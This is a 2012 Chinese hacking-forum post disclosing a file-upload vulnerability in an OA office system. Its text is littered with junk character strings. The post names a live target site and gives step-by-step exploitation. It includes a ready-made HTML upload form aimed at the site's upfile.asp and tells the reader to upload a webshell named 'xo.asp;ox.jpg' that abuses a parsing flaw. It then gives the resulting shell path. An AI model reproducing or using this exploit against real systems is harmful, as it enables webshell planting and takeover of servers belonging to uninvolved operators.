找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1972|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞/ L. M* m0 }1 |0 X2 M/ S8 F4 C
, w/ _4 k0 ~; a  B( w
系统介绍:; x% H& R( z$ ~0 I
4 z7 y8 \, s! k' _# L3 A7 z6 i
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。# ~! i. b+ x, T9 S* k" T

/ H% I" V7 d* z6 `! ^主要功能:+ N5 E7 @, O* A) d% _  n
公司通告
6 @# W# t& h( i* o工作计划
9 ]; t2 \% [- c" W- `通讯助理 4 `) p' q) l/ C( H, B9 k) @5 B! U
客户资源 # s- `* H$ n8 A5 o: |
我的公文
1 g, D# F3 d. ]" c公文传阅 4 p+ H8 k, y: c5 V
公共资源
8 g4 X" k1 Y( r- X: \资源预约 # g6 w! q) B, B6 h; y6 A
今日考勤
3 t- t3 X/ f; m5 m9 i, T1 Z个人计划
( V( ~; f, r- N* C2 b6 {个人通讯录 8 N5 L" s0 P, U, C/ b, j7 Z
个人基本档案
: u& w% N6 K3 `  s6 Q未读邮件 9 H: X8 S, l7 j* F
发邮件 8 |) j! G8 e3 P, x) {5 L
收件夹
: p8 E2 A+ K& x" p# y寄件夹
" x  {. S( K9 o: t' b网络硬盘 0 c" w, D4 {* |. B! L2 U
网络会议
4 y& ]% P+ {* D: ]' `* i5 R网络调查 * }/ w( |+ [5 \8 M2 [$ j! \: g
交流论坛" e9 e5 g7 s  B' c4 i, b' c
. }" z4 W) x9 O* @- X7 Y9 |' E
有兴趣测试的朋友可以下源码看看
( L, K. s) `# g4 n4 u2 l' H1 U6 q8 j4 `1 w5 x: k
源码下载:
: H0 s' }2 q0 h" o) {
+ R6 ]6 A7 f. n* A: j0 L9 T2 \( Q8 Dhttp://www.mycodes.net/30/4750.htm7 G+ \, [- C$ U- k: g! ?. x
7 e2 M9 r7 S9 U/ k& p4 e) S
漏洞介绍:* n9 ~# x+ C: R
' o: o+ x) ]: {% |6 e7 S, R
由upfile.asp上传文件漏洞引起
# g" K4 P8 A1 G/ m( Y4 f. V" F
测试方法:( e8 m' r9 G9 F% I

% y% Z& f- h$ z! e# u+ O. _使用名小子上传http://www.itlynn.com/upfile.asp即可
8 M. h' T) p' w$ w5 U, ]( D3 y' p. M- ]. @
如果upfile.asp文件被删除不存在。
; m& m* S" ]) }1 c' u9 J4 C- u9 `  U: [9 [3 d
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
5 I$ I8 C3 h3 M* r* f3 f
# z: R. t' @' }- ]: I5 c如果存在那么将如下代码保存为upfile.html。2 o; O4 F; }: e& G' L; b6 [

5 e' O% U# u( S9 N( \然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
1 e. G! d9 v/ G' j1 k) H2 ?) k+ j9 @# _% x* W
5 w! j  K+ {$ ?

& R2 @' `$ {9 t$ j01 <table border='0' align="center" cellpadding="5"> 5 v8 H9 |- S+ U/ i# w; l+ [

$ |2 Q) ?6 W7 M+ }: b. o4 z02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 5 x2 M8 p+ v  C: W. a

$ a* f+ d, U" [! N+ E9 X! T# ?7 l5 ^03 <tr> 0 O4 g+ V( ]2 n3 s# ]: _. O* c

% [, y  \3 r) U* y7 ?# u04             <td>报错:</td>
3 Z' P0 I( Q1 R. D  D
. _0 \9 H. F; z9 P9 F- u6 U1 d05             <td><input type='radio' name='errnumber' value='0'>
8 M% _5 U+ _2 N( i0 L% N, ^  ?2 N7 v: o: a+ Q/ O4 U( U
06               自动更名
3 [3 a/ m8 g; v& L3 d% c
# s7 Q2 K+ f  _07               <input type='radio' name='errnumber' value='1' checked>
; Y2 |) K7 z. }; ^6 J9 j
0 R" `' i. \. o% f3 K8 c6 U08               报错方式
+ m% P+ H+ ?& f& c3 E. \8 i# f; R7 F/ }7 b# @$ [( ?! Q
09               <input type='radio' name='errnumber' value='2'>
& M; I/ V  L7 A  X- U( Q6 k5 `% ]/ `# q  E; c; X' y
10               直接覆盖</td> - C  s, t& \1 A. }; z: w
' V2 v; u, N+ E: L6 \
11           </tr>
% h# k+ a; q! ~' w  L3 {0 r4 y  b0 R; f! `. W( l& B/ g+ O! I: M
12           <tr> ( J3 R* N+ V( D. e. o/ z* c

; O3 f2 b$ G$ ]* e( d* S13             <td>主题:</td> 3 I! O. G6 D3 M. x8 x+ h

# ^4 X0 X  a# z0 z14             <td><input type='text' name='filename' size='30'></td> % n- t! m' w8 M3 R' @+ E

- X; o) O- H% u  M# w% E15           </tr>
7 K/ t$ \! g4 X- m9 ~4 t, w/ i, F$ w
16           <tr>
; h2 d/ ^2 e" v* ^5 e4 J& p  K) e. E  \- }- q
17             <td>文件:</td>
! c( d( D5 O6 f+ Y) t2 ?: |' J
, P/ Q7 S& w: v' g! |18             <td><input type="file"name="fruit"size="30"></td> ' Q( l5 b: G5 e4 W1 |

1 M7 L/ y! V/ a4 q- [+ H+ E+ Q: V* p19           </tr> . M, h1 A* N2 s+ p! U, m3 a) |
  E9 H/ s. [" A# E0 i
20           <tr>
1 q% n( i  g! l
1 l( {* F/ ]* V21             <td valign='top'>简介:</td>
1 O2 s; ?7 Y9 R; E8 V% F0 I" O# W) D
4 `5 W8 l, |$ Z0 l& O; q' l' p; \3 P22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> * L: f1 X7 K% S9 m$ B/ ?! d; V

5 N7 r$ c1 W) p( k; h  v% c23           </tr> ' X# a- K5 M1 A; n" T; c: ], C

5 F7 ~+ s- P: G24   
! M1 N8 {" T+ h% G) Y$ D( o+ {- E
  A' w' Q* y4 o, T0 d  p25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> / B$ V0 X1 I" Q# Y

" }3 y$ Z5 l9 r26           </tr> " D" U" o* X' U/ u: ?
( I8 x5 R( y! x! ]- u# c
27         </form>
! D: G( w1 v$ Y" q3 i' `
5 W" A1 e1 v) c6 R  ~然后打开上传一个文件名为xo.asp;ox.jpg的文件。
6 e: C' {& C9 F1 D& g0 ]. c( d

/ W5 b* m6 p8 R0 C! Q1 Y  @; d
: k3 p8 K! E: O  k# }( Z% {  j上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg7 N" N5 d  `1 U6 m( z" U- D

: C7 i6 ?2 n( j/ s此漏洞需要配合解析漏洞利用。
( J( o9 r* D& {4 W! z) N9 f' a+ s2 f1 z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表